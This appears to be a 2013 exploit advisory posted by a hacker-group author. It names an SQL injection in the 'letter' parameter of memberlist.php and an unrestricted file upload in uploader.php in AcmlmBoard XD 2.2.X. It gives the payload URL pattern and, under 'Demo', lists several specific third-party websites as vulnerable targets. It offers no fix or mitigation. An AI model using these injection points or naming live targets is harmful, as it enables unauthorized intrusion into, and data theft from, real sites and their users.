facebook facebook twitter rss

AcmlmBoard XD 2.2.X SQL Injection/File Upload Vulnerabilities

Author: TUNISIAN CYBER , Published: 16-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: AcmlmBoard XD 2.2.X SQL Injection/File Upload Vulnerabilities
[+] Date: 16-12-2013
[+] Category: WebApp
[+] Vendor: https://github.com/ABXD/ABXD
[+] Google Dork: use your mind
[+] Tested on: Win7
[+] Friend's blog: http://na3il.wordpress.com/

########################################################################################
Vulns:
I/ SQL injection:
127.0.0.1/[PATH]/memberlist.php?=[id]&letter='

II/File Upload:
2/ 127.0.0.1/[PATH]/uploader.php (you have to register)

Demo:
http://www.ctconcerto.net/forum/uploader.php
http://www.brawlcustommusic.com/board/memberlist.php?=3&letter='
http://dannyb.byethost15.com/forum/memberlist.php?=3&letter='
http://helmet.kafuka.org/noxico/board/memberlist.php?=3&letter='
http://icg.uphero.com/board/memberlist.php?=3&letter='
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt,sec4ever

Like us on Facebook :